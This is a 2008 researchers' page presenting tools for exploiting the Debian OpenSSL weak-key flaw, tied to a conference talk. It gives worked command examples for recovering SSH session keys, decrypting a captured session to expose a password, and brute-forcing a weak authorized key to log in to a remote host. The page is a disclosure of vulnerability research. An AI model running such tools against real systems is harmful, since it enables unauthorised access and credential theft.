SSH tools related to the OpenSSL/Debian vulnerability

About these tools

We (Raphaël Rigo, Romain Raboin and Julien Tinnes) gave a short talk at SSTIC 08 about some of the tools we and Yoann Guillot wrote after the OpenSSL/Debian advisory to remotely discover vulnerable keys in authorized_keys files, decipher SSH traffic and retrieve DSA private keys (even from non weak keys). We also wrote an article in french in this MISC issue.

For now we have disclosed the following tools (we might add other tools soon):

ssh_kex_keygen: a tool to retrieve the Diffie-Hellman session key in a SSH conversation capture involving at least one OpenSSH running with a vulnerable OpenSSL. Key recovery will take half a minute on decent hardware.

Be aware that this tool does'nt parse a pcap file, nor does it decipher the traffic for you, it has to be used in a higher-level program such as ssh_decoder in order to be useful.
ssh_decoder: a tool to decipher a ssh session from a pcap file (uses ssh_kex_keygen). This will allow you to retrieve passwords or public SSH keys used for authentication that may be vulnerable and to read older SSH traffic.
bfssh: a multi-threaded tool written in C to retrieve weak keys in authorized_keys files on a remote machine. It'll test for all possible keys for a given architecture in less than five minutes on a decent network. You'll need a vulnerable libssl/libcrypto and libssh to compile/use it.

Example 1 (ssh_kex_keygen)

./keygen -g $MYGROUP -k $MYSNIFFED_GA -b 256 -s -p 0-32767 -n 4 KEY : 00301439070BCC051E15569D2F7F9BD0ABBD3AA8755AC939B53EED39D266251C3377435 PID : 30149

Example 2 (ssh_decoder)

$ tcpick -wRC -wRS -r pcapssh_putty.cap Starting tcpick 0.2.1 at 2008-07-09 17:37 CEST Timeout for connections is 600 tcpick: reading from pcapssh_putty.cap 1 SYN-SENT 172.24.94.237:52363 > 172.24.83.255:ssh 1 SYN-RECEIVED 172.24.94.237:52363 > 172.24.83.255:ssh 1 ESTABLISHED 172.24.94.237:52363 > 172.24.83.255:ssh 1 FIN-WAIT-1 172.24.94.237:52363 > 172.24.83.255:ssh 1 TIME-WAIT 172.24.94.237:52363 > 172.24.83.255:ssh 1 CLOSED 172.24.94.237:52363 > 172.24.83.255:ssh tcpick: done reading from pcapssh_putty.cap 69 packets captured 1 tcp sessions detected $ ls tcpick* tcpick_172.24.94.237_172.24.83.255_ssh.clnt.dat tcpick_172.24.94.237_172.24.83.255_ssh.serv.dat $ ruby ssh_decoder.rb tcpick* * read handshake cipher: aes256-ctr, mac: hmac-sha1, kex_hash: sha1, compr: none * bruteforce DH DH shared secret : 00c81a4d4fe19a522a972bb9ede9d5901.....(cut) * derive keys * decipher streams * successful authentication packet {:username=>"toto", :nextservice=>"ssh-connection", :auth_method=>"password", :change=>0, :password=>"toto"} * deciphered streams saved to "sshdecrypt.0.client.dat" & "sshdecrypt.0.server.dat"

Example 3 (bfssh)

$ ./bfssh -h ssllol -u toto -p22 -d6 -t rsa -s 2048 -a x86 == BFSSH a strong debian weak key bruteforcer == MaxAuthTries: 6 STATUS: thread: 5 test key: 05790 ... 05795 Authentication success: ./key-x86/rsa2048/id_rsa.05784.pub $ ssh -i ./key-x86/rsa2048/id_rsa.05784 toto@ssllol [snip] $ id uid=1000(toto) gid=1000(toto) groups=4(adm),109(admin),1000(toto)